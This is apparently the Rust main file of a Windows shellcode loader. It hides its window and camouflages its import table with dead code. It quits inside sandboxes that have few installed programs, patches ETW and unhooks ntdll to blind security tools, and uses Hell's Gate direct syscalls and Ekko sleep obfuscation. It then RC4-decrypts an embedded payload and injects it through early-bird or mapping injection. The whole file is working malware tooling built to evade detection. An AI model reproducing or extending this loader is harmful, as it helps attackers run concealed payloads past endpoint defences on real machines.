#![cfg_attr(windows, windows_subsystem = "windows")]
#![allow(unused_imports, dead_code)]

mod types;
mod hashing;
mod peb;
mod hellsgate;
mod syscall;
mod inject;

#[cfg(feature = "early_bird")]
mod early_bird;

#[cfg(feature = "anti_analysis")]
mod anti_analysis;

#[cfg(feature = "etw_patch")]
mod etw;

#[cfg(feature = "unhook_disk")]
mod unhook;

#[cfg(feature = "sleep_obf")]
mod sleep_obf;

// Generated by build.rs from hfbuild env vars
mod generated {
    include!(concat!(env!("OUT_DIR"), "/generated.rs"));
}

use generated::{ENC_KEY, HINT_BYTE, PAYLOAD, SLEEP_MS};
use types::*;

#[cfg(windows)]
use windows_sys::Win32::System::Threading::GetCurrentThreadId;
#[cfg(windows)]
use windows_sys::Win32::System::Registry::{
    RegCloseKey, RegOpenKeyExW, RegQueryInfoKeyW,
    HKEY_LOCAL_MACHINE, KEY_READ,
};

// IatCamouflage: imports benign APIs in a dead code path so they appear in the IAT.
// Uses a compile-time seed so the dead branch is never taken.
#[cfg(windows)]
fn iat_camouflage() {
    extern "system" {
        fn GetLastError() -> u32;
        fn HeapAlloc(heap: HANDLE, flags: u32, bytes: usize) -> *mut u8;
        fn HeapFree(heap: HANDLE, flags: u32, mem: *mut u8) -> i32;
        fn GetProcessHeap() -> HANDLE;
        fn MessageBoxA(hwnd: HANDLE, text: *const u8, caption: *const u8, ty: u32) -> i32;
        fn GetTickCount() -> u32;
        fn IsWindowVisible(hwnd: HANDLE) -> i32;
        fn GetForegroundWindow() -> HANDLE;
        fn MultiByteToWideChar(cp: u32, flags: u32, src: *const u8, src_len: i32, dst: *mut u16, dst_len: i32) -> i32;
    }
    unsafe {
        let heap = GetProcessHeap();
        let p = HeapAlloc(heap, 8, 0xFF) as *mut i32;
        if p.is_null() { return; }
        let seed = (b'0' as i32) * -40271
            + GetTickCount() as i32 % 256;
        *p = seed % 0xFF;
        if *p > 350 {
            // Dead branch — imports appear in IAT but never execute
            GetLastError();
            IsWindowVisible(core::ptr::null_mut());
            GetForegroundWindow();
            MessageBoxA(core::ptr::null_mut(), core::ptr::null(), core::ptr::null(), 0);
            MultiByteToWideChar(0, 0, core::ptr::null(), 0, core::ptr::null_mut(), 0);
        }
        HeapFree(heap, 0, p as *mut u8);
    }
}

/// Count installed programs under HKLM\...\Uninstall via the registry.
/// Returns the subkey count — used as a sandbox check (real systems have
/// many installed apps; automated analysis VMs typically have < 10).
#[cfg(windows)]
fn enum_installed_software() -> u32 {
    let subkey: Vec<u16> = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\0"
        .encode_utf16()
        .collect();
    let mut hkey = 0isize;
    let rc = unsafe {
        RegOpenKeyExW(HKEY_LOCAL_MACHINE, subkey.as_ptr(), 0, KEY_READ, &mut hkey)
    };
    if rc != 0 {
        return 0;
    }
    let mut num_subkeys: u32 = 0;
    unsafe {
        RegQueryInfoKeyW(
            hkey,
            core::ptr::null_mut(), core::ptr::null_mut(), core::ptr::null_mut(),
            &mut num_subkeys,
            core::ptr::null_mut(), core::ptr::null_mut(), core::ptr::null_mut(),
            core::ptr::null_mut(), core::ptr::null_mut(), core::ptr::null_mut(),
            core::ptr::null_mut(),
        );
        RegCloseKey(hkey);
    }
    num_subkeys
}

/// Wrapper around GetCurrentThreadId — pulls the Win32 API into the IAT and
/// can be used at runtime to verify we're running on the expected thread.
#[cfg(target_arch = "x86_64")]
fn get_current_thread_id() -> u32 {
    unsafe { GetCurrentThreadId() }
}

fn main() {
    // Loader execution order mirrors main.c:
    // IatCamouflage → PatchEtw → UnhookNtdll → InitializeSyscalls →
    // AntiAnalysis → EkkoSleep → Rc4DecryptPayload → inject

    #[cfg(windows)]
    iat_camouflage();

    // Sandbox check: bail out if fewer than 10 programs are installed
    #[cfg(windows)]
    if enum_installed_software() < 10 {
        return;
    }

    #[cfg(target_arch = "x86_64")]
    let _tid = get_current_thread_id();
    #[cfg(feature = "etw_patch")]
    unsafe { etw::patch_etw(); }

    #[cfg(feature = "unhook_disk")]
    unsafe { unhook::unhook_ntdll(); }

    if !inject::initialize_syscalls() {
        return;
    }

    #[cfg(feature = "anti_analysis")]
    unsafe { anti_analysis::run(20000); }

    #[cfg(feature = "sleep_obf")]
    unsafe { sleep_obf::ekko_sleep(SLEEP_MS); }

    // Decrypt payload in place
    let mut payload = PAYLOAD.to_vec();
    if !inject::rc4_decrypt_payload(&mut payload, ENC_KEY, HINT_BYTE) {
        return;
    }

    #[cfg(feature = "early_bird")]
    {
        unsafe { early_bird::inject(&payload); }
        return;
    }

    #[cfg(not(feature = "early_bird"))]
    {
        // Local injection: NtCurrentProcess() = -1 as HANDLE
        inject::remote_mapping_injection(
            !0usize as types::HANDLE,
            &mut payload,
            true,
        );
    }
}
